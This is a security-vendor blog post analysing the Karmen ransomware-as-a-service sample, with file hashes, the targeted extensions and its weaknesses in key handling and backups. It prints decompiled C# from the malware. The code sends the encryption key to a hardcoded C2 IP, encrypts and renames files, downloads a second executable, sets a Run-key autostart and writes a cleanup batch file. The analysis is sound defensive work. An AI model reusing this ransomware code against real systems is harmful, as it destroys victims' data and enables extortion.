Karmen is a new RaaS (Ransomware as a Service) being offered in the underground forum. According to a recent research from Recorded Future, this ransomware is being advertised and sold in a Russian-speaking underground hacking forum at a relatively cheap price of $175.
Karmen was first spotted by MalwareHunter in mid-March. Cyphort currently detects this file as RANSOM_FILECRYPTOR.DC. CyphortLabs took a deeper analysis of one sample and uncovered some flaws that make this ransomware somewhat not so tight.
File Properties
MD5: 05427ed1c477cc01910eb9adbf35068d
Compilation Time Stamp: Sun Mar 12 07:25:00 2017
The file is a .NET compiled executable. It is not packed nor obfuscated, so strings and IOCs related to the malware can be easily seen using basic string checking tools:
String dump using PE Studio
Installation
Karmen will generate 2 random strings. First, a 30-byte key for its AES encryption and then a 15-byte key used as the ID of the infected machine.
private void Form1_Load(object sender, EventArgs e){string text = this.gen(30);string text2 = this.gen(15);new WebClient().DownloadString("http://91.223.123.78/data.php?id=" + text2 + "&key=" + text);this.ldf(text);this.Inf(text2);Application.Exit();}
It will then send the AES key and the ID to a hardcoded ip address, 91.223.123.78 via HTTP. The communication is not encrypted nor obfuscated so by intercepting the network communication, you can obtain the encryption key used. This is probably why Karmen is advertising that it will delete the decryption module if an analysis environment is detected.
Encryption
After sending the key and ID to its C2 server, it will enumerate all logical drives and start encrypting all files with the following extension names:
.sql .css .docx .csv .js .exl .zip .txt .kdbx .mdbackup .pdf .kdb .syncdb .doc
It uses a basic AES-256 encryption method.
public void enf(string file, string pwd)
{
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
byte[] array = Encoding.UTF8.GetBytes(pwd);
array = SHA256.Create().ComputeHash(array);
byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);
File.WriteAllBytes(file, bytes);
File.Move(file, file + ".grt");
}
Once the files are encrypted, it adds the file extension “.grt” to the original files. This is used by the malware as a marker of encrypted files. This is a good indicator that you are probably infected by the Karmen Ransomware.
Decryptor
It will download another executable, decrypter.exe, from the same C2 server and create an autostart entry for it. This is most likely the decryptor tool. Along with it, it gets additional data from C2 and creates the following components in the %temp% folder.
Id.txt
lnk.txt
btc.txt
adr.txt
del.bat
public void Inf(string id){WebClient webClient = new WebClient();string text = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\";webClient.DownloadFile(new Uri("http://91.223.123.78/decrypt.exe"), text + "decrypt.exe");RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");try{registryKey.SetValue("DecryptFiles", text + "decrypt.exe");registryKey.Close();}catch{}this.CreateFile(text, "id.txt", id);this.CreateFile(text, "lnk.txt", "http://91.223.123.78/");this.CreateFile(text, "btc.txt", this.GetFile("http://91.223.123.78/btc.php?id=" + id));this.CreateFile(text, "adr.txt", this.GetFile("http://91.223.123.78/adr.php?id=" + id));string[] contents = new string[]{"@echo off","taskkill /f /im decrypt.exe","del " + text + "decrypt.exe","del " + text + "lnk.txt","del " + text + "btc.txt","del " + text + "adr.txt","del " + text + "del.bat"};File.WriteAllLines(text + "del.bat", contents);Process.Start(text + "decrypt.exe");}
During the time of our analysis, the C2 server was down so we were not able to get a copy of the decrypter code. But we believe based on the code we saw that the decryptor will run in the background waiting for a signal from C2 server to start decrypting after the ransom is paid.
However, we were able to obtain a different variant of decrypt.exe. This one though, was downloaded from a different domain, so it seems, this malware is now active in the wild.
MD5: 1ea26d0af5da76110e248da85656a184
It gets very few detections from AVs on the first submission to VirusTotal.
Cyphort currently detects this file as RANSOM_HIDDENTEAR.DC.
The malware displays the following window when executed without any close or exit button. It also has an option to display German and English language which gives us an idea about the author’s target.
The decryptor will first check if the machine contains the file %temp%\id.txt which contains the id of the infected user, if not found it will just delete itself.
If the said file above exists, it will then connect to its C2 server with the id to get the decryption key:
public void Check(string id, string lnk)
{
string text = this.inf(lnk + "check.php?id=" + id);
bool flag = text.Length > 25;
if (flag)
{
this.timer1.Enabled = false;
this.fDD(text);
}
}
The server decides if it will return the key or not most likely based on whether the user has paid the ransom. Decryptor expects the key to be greater than 25 bytes. If the condition is satisfied, it will proceed with the decryption process using the obtained key.
Karmen’s Weaknesses
Weak Key Management and Symmetric Encryption
Karmen uses the typical AES-256 encryption which could be brute forced. Aside from this, it exposes the key by sending it to the C2 server in plain text format. So if you have managed to capture the Network Traffic, the key can be easily recovered. Due to the fact that it is based on HiddenTear (an open sourced ransomware), some have already created a decryption tool for this ransomware.
Not Deleting Backups
The said Ransomware also failed to delete the backups such as the shadow copies which gives hope to the infected user to simply recover by restoring shadow copies.
Final Thoughts
The malware we analyzed is probably a light or an early version of Karmen RaaS. We are not able to identify a sample that detects a sandbox or analysis tools as it is advertised in the underground forum. The distribution of the malware is currently unknown but we believe that some of them are currently in the wild. Despite being a cheap and working service, we have found several weaknesses to Karmen. The way the encryption method is implemented, we believe that the authors behind this are probably new to the field of ransomware. Having said that, any ransomware is still a dangerous threat and will always be a pain when infected.
Special thanks to Joe Dela Cruz and the rest of Cyphort Labs team for their help with the analysis.
The post Karmen Ransomware-as-a-Service flawed appeared first on Cyphort.